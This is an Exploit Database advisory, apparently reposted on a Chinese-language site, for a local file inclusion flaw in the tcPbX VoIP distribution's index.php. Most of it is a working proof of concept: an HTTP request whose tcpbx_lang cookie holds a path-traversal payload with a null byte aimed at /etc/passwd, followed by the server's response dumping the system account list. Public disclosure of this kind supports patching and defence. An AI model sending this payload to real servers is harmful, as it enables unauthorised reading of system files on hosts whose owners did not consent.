tcPbX – ‘tcpbx_lang’ Local File Inclusion

• Exploit Database
• 13 阅读

• 作者： 0x4148
  日期： 2016-08-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40278/

• Vulnerable hardware : tcpbx voip distro
  Vendor : www.tcpbx.org
  Author : Ahmed sultan (@0x4148)
  Email : 0x4148@gmail.com
  
  Summary : According to the vendor's site ,
  tcPbX is a complete and functional VoIP phone system based on Asterisk open
  source software and CentOS operating system.
  The simplified installation and the new administration portal allow you to
  have a full featured phone system in less than an hour without specific
  skills on linux or asterisk
  
  Vulnerable file : /var/www/html/tcpbx/index.php
  The software suffer from LFI flaw because of the tcpbx_lang parameter isn't
  sanitized before being proceeded in the file
  
  Request
  GET /tcpbx/ HTTP/1.1
  Host: server
  User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64; rv:47.0)
  Gecko/20100101 Firefox/47.0
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-GB,en;q=0.5
  Accept-Encoding: gzip, deflate
  Cookie: tcpbx_lang=../../../../../../../../../../etc/passwd%00;
  PHPSESSID=cupsei1iqmv2bqa81pkcvg4jg1
  Connection: close
  Cache-Control: max-age=0
  -----------------------------------
  Response
  HTTP/1.1 200 OK
  Date: Fri, 19 Aug 2016 15:45:30 GMT
  Server: Apache/2.2.15 (CentOS)
  X-Powered-By: PHP/5.3.3
  Expires: Thu, 19 Nov 1981 08:52:00 GMT
  Cache-Control: no-store, no-cache, must-revalidate, post-check=0,
  pre-check=0
  Pragma: no-cache
  Connection: close
  Content-Type: text/html; charset=UTF-8
  Content-Length: 23874
  
  root:x:0:0:root:/root:/bin/bash
  bin:x:1:1:bin:/bin:/sbin/nologin
  daemon:x:2:2:daemon:/sbin:/sbin/nologin
  adm:x:3:4:adm:/var/adm:/sbin/nologin
  lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
  sync:x:5:0:sync:/sbin:/bin/sync
  shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
  halt:x:7:0:halt:/sbin:/sbin/halt
  mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
  uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
  operator:x:11:0:operator:/root:/sbin/nologin
  games:x:12:100:games:/usr/games:/sbin/nologin
  gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
  ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
  nobody:x:99:99:Nobody:/:/sbin/nologin
  vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
  sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
  ntp:x:38:38::/etc/ntp:/sbin/nologin
  saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin
  mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
  smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
  apache:x:48:48:Apache:/var/www:/sbin/nologin
  mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
  postfix:x:89:89::/var/spool/postfix:/sbin/nologin